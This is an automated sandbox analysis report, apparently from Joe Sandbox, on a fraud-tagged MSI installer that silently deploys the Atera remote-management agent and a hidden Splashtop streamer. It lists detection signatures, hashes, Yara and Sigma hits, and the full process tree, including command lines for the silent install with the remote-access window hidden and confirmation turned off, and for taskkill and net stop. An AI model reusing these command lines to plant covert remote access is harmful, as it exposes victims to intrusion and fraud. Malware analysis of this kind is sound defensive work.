Windows Analysis Report
Arquivo_4593167.msi

Overview

General Information

Sample name: Arquivo_4593167.msi
Analysis ID: 1545758
MD5: 2ba70a300e16d1b51bd103de907777d8
SHA1: 9774343aeb3b6f06593fc84a59422ef3b8cce66b
SHA256: 0d47740bf97710835ebe91ac545ff0da45d81b54dfb8e2dea485fe5a123ae468
Tags: AteraAgent, fraud, msi, user-johnk3r

Detection

AteraAgent
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AteraAgent
AI detected suspicious sample
Creates files in the system32 config directory
Enables network access during safeboot for specific services
Installs Task Scheduler Managed Wrapper
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive sound device information (via WMI, Win32_SoundDevice, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sample is not signed and drops a device driver
Yara detected Generic Downloader
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses net.exe to stop services
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • msiexec.exe (PID: 7012 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Arquivo_4593167.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 7132 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 3632 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0B94C8984E2657846CB3FC17409B05D4 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • rundll32.exe (PID: 2256 cmdline: rundll32.exe "C:\Windows\Installer\MSIC672.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4507343 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 5780 cmdline: rundll32.exe "C:\Windows\Installer\MSIC961.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4508140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 2084 cmdline: rundll32.exe "C:\Windows\Installer\MSIDCAB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4512968 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation MD5: 889B99C52A60DD49227C5E485A016679)
      • rundll32.exe (PID: 3320 cmdline: rundll32.exe "C:\Windows\Installer\MSIF4AD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4519093 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd MD5: 889B99C52A60DD49227C5E485A016679)
    • msiexec.exe (PID: 4948 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • net.exe (PID: 7020 cmdline: "NET" STOP AteraAgent MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 4504 cmdline: C:\Windows\system32\net1 STOP AteraAgent MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • taskkill.exe (PID: 4904 cmdline: "TaskKill.exe" /f /im AteraAgent.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sppsvc.exe (PID: 4904 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
    • AteraAgent.exe (PID: 2640 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="000111.financeiro@yamahaconcessionaria.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000LlkxmIAB" /AgentId="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2" MD5: 477293F80461713D51A98A24023D45E8)
    • msiexec.exe (PID: 7516 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 556B5128AD7072E16BEB10DB90B1A40C E Global\MSI0000 MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • _isA1FD.exe (PID: 7604 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E00D6CF4-4FC3-431C-B643-8FF5D1691F3C} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7636 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{92D3031C-81C4-4FED-8F50-F5E3BE9F3612} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7668 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4C499929-14EA-4E52-BDA5-131742626400} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7704 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6385CD88-DCB3-4881-A482-8EE7F96DDDE3} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7736 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{8ABF8E23-F9FD-49C3-8B2D-36EBD8434563} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7776 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4103781B-B841-4FC0-AA1E-5FD5FA8D8AE8} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7808 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{FB3E51D0-455D-47D0-B21A-C3DC48DCD266} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7844 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{AA5AA93B-7BA4-4056-819A-23A48FF3891F} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7876 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{035C7190-A369-4041-A248-C0E4DB43C54F} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • _isA1FD.exe (PID: 7908 cmdline: C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B627E9BE-EB25-4498-B44A-CDE0D79185EC} MD5: 7A1C100DF8065815DC34C05ABC0C13DE)
      • cmd.exe (PID: 7948 cmdline: C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRServer.exe /T" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • taskkill.exe (PID: 7996 cmdline: taskkill.exe /F /IM SRServer.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • cmd.exe (PID: 8028 cmdline: C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRApp.exe /T" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AteraAgent.exe (PID: 6200 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 1352 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 2916 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000LlkxmIAB MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 2932 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000LlkxmIAB MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 6460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AgentPackageAgentInformation.exe (PID: 980 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000LlkxmIAB MD5: 31DEF444E6135301EA3C38A985341837)
      • conhost.exe (PID: 3152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3632 cmdline: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cscript.exe (PID: 6768 cmdline: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
    • AgentPackageSTRemote.exe (PID: 1016 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000LlkxmIAB MD5: 749C51599FBF82422791E0DF1C1E841C)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SplashtopStreamer.exe (PID: 7384 cmdline: "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1 MD5: F1356F7FBD37502B529D9BCD643FB7AB)
        • PreVerCheck.exe (PID: 7440 cmdline: "C:\Windows\Temp\unpack\PreVerCheck.exe" /s /i sec_opt=0,confirm_d=0,hidewindow=1 MD5: DF5EB1AF99091A902EFFA52463EDA084)
          • msiexec.exe (PID: 7460 cmdline: msiexec /norestart /i "setup.msi" /qn /l*v "C:\Windows\TEMP\PreVer.log.txt" CA_EXTPATH=1 USERINFO="sec_opt=0,confirm_d=0,hidewindow=1" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • AteraAgent.exe (PID: 1852 cmdline: "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" MD5: 477293F80461713D51A98A24023D45E8)
    • sc.exe (PID: 1516 cmdline: "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 1868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7280 cmdline: C:\Windows\System32\svchost.exe -k smphost MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Windows\Temp\~DF6260B0A6EE189872.TMP | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Windows\Temp\~DFF7EC8F46D19662E2.TMP | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Windows\Installer\MSIF4AD.tmp-\AlphaControlAgentInstallation.dll | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.Utils.dll | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
0000000D.00000002.2266876260.0000020AA05F0000.00000004.00000020.00040000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
00000018.00000002.2916644902.0000004DD77F5000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000000D.00000002.2270306119.0000020AA15CC000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000000D.00000002.2267142526.0000020AA07E1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
0000000D.00000002.2281496750.0000020AB9B88000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |

Source | Rule | Description | Author | Strings
20.2.AgentPackageAgentInformation.exe.1be62a40000.1.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
12.0.AteraAgent.exe.1c5cb450000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
20.0.AgentPackageAgentInformation.exe.1be62230000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |
20.0.AgentPackageAgentInformation.exe.1be62230000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
33.0.AgentPackageSTRemote.exe.21719510000.0.unpack | JoeSecurity_AteraAgent | Yara detected AteraAgent | Joe Security |

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: SRCredentialProvider, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7516, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{97E1814E-5601-41c8-9971-10C319EF61CC}\(Default)
Source: Process started, Author: Michael Haag: Data: Command: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3632, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus, ProcessId: 6768, ProcessName: cscript.exe
Source: Process started, Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 4948, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 7020, ProcessName: net.exe
Source: Process started, Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems): Data: Command: "NET" STOP AteraAgent, CommandLine: "NET" STOP AteraAgent, CommandLine|base64offset|contains: I3, Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000, ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 4948, ParentProcessName: msiexec.exe, ProcessCommandLine: "NET" STOP AteraAgent, ProcessId: 7020, ProcessName: net.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k smphost, CommandLine: C:\Windows\System32\svchost.exe -k smphost, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k smphost, ProcessId: 7280, ProcessName: svchost.exe

No Suricata rule has matched

AV Detection

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, ReversingLabs: Detection: 20%
Source: Arquivo_4593167.msi, ReversingLabs: Detection: 23%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 96.3% probability
Source: C:\Windows\Temp\unpack\PreVerCheck.exe, Code function: 37_2_00BB14D0 CryptProtectData, 37_2_00BB14D0
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-console-l1-2-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-heap-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.IsolatedStorage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-util-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-runtime-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Mail.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Ping.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Security.Claims.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Console.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\createdump.exeJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.DataAnnotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.Compression.ZipFile.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.Process.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Web.HttpUtility.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-synch-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-memory-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-core-libraryloader-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Diagnostics.DiagnosticSource.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.WebHeaderCollection.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Dynamic.Runtime.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Net.Requests.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-conio-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.IO.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Globalization.Extensions.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.Core.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\hostpolicy.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.Formatters.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Transactions.Local.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\.versionJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Drawing.Primitives.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clrjit.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Xml.ReaderWriter.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Dataflow.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.ComponentModel.Annotations.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\clretwrc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Threading.Tasks.Parallel.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Memory.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\api-ms-win-crt-math-l1-1-0.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.DiaSymReader.Native.amd64.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Collections.NonGeneric.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.Runtime.Serialization.dllJump to behavior
